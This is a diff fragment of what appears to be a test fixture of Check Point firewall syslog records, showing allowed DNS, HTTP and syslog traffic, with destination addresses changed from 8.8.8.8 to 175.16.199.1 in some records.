FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500735"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56119"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:52:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d23f,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500735"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44079"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:52:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d23f,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500735"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40876"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:52:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d244,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500740"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40695"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:52:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d244,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500740"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41777"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:52:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d244,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500740"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55081"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] 
@@ -1452,68 +1452,68 @@ <134>1 2020-03-29T16:52:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d245,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"33260"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10228"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T16:52:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d246,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"63365"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T16:52:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d246,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; 
__policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"53580"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10229"; xlatesrc:"0.0.0.0"] -<134>1 2020-03-29T16:52:26Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d24a,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500746"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38147"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:52:26Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d24a,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500746"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; 
rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45727"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:52:26Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d24a,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500746"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38147"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:52:26Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d24a,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500746"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45727"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:52:28Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d24c,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; 
originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44917"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2020-03-29T16:52:28Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d24c,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500748"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47881"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:52:29Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d24d,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500749"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; 
rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34184"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:52:28Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d24c,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500748"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47881"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:52:29Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d24d,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500749"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34184"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:52:31Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d24f,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; 
originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500751"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52859"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:52:31Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d24f,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500751"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47176"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:52:33Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d251,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500753"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; 
rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54686"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:52:34Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d252,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500754"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58509"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:52:38Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d256,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500758"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41490"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:52:38Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d256,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; 
originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500758"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36241"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:52:38Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d256,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500758"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33708"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:52:39Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d257,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500759"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; 
rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39041"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:52:40Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d258,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500760"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48567"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:52:40Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d258,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500760"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53988"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:52:40Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d258,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; 
originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500760"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49354"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:52:48Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d260,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500768"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56759"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:52:48Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d260,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500768"; layer_name:"Network"; 